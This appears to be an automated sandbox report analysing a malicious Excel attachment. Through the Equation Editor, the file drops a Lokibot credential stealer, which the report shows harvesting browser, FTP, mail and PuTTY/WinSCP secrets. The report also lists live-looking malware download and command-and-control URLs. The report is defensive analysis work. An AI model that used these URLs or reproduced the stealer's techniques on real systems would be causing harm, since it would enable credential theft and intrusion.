            Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsxJump to behavior
            Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR138.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: MV FORTUNE TRADER.xlsxStatic file information: File size 2551296 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: MV FORTUNE TRADER.xlsxInitial sample: OLE indicators vbamacros = False
            Source: MV FORTUNE TRADER.xlsxInitial sample: OLE indicators encrypted = True

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
            Yara detected aPLib compressed binaryShow sources
            Source: Yara matchFile source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
            Source: Yara matchFile source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0525BD22 push es; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0525E027 push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0525B463 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0525EA1F push edi; retf
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0525EE79 push E83768D8h; retf
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
            Source: MV FORTUNE TRADER.xlsxStream path 'EncryptedPackage' entropy: 7.99992623739 (max. 8.0)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 948Thread sleep time: -420000s >= -30000s
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_052593E3 push dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00406069 GetUserNameW,
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected LokibotShow sources
            Source: Yara matchFile source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Yara detected LokibotShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
            Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Users\Public\vbc.exeCode function: HeapCreate, PopPassword
            Source: C:\Users\Public\vbc.exeCode function: HeapCreate, SmtpPassword
            Source: Yara matchFile source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected LokibotShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsExploitation for Client Execution13Path InterceptionProcess Injection12Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information21Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSQuery Registry1Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\vbc.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe36%ReversingLabsWin32.Trojan.Generic
            C:\Users\Public\vbc.exe36%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.vbc.exe.220e50.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.3.vbc.exe.240000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            cutt.ly1%VirustotalBrowse
            becharnise.ir17%VirustotalBrowse
            stdyrusschinetwomast.dns.army1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://kbfvzoboss.bid/alien/fre.php14%VirustotalBrowse
            http://kbfvzoboss.bid/alien/fre.php0%Avira URL Cloudsafe
            http://alphastand.win/alien/fre.php10%VirustotalBrowse
            http://alphastand.win/alien/fre.php0%Avira URL Cloudsafe
            http://alphastand.trade/alien/fre.php11%VirustotalBrowse
            http://alphastand.trade/alien/fre.php0%Avira URL Cloudsafe
            http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe10%VirustotalBrowse
            http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe100%Avira URL Cloudmalware
            http://alphastand.top/alien/fre.php0%Avira URL Cloudsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
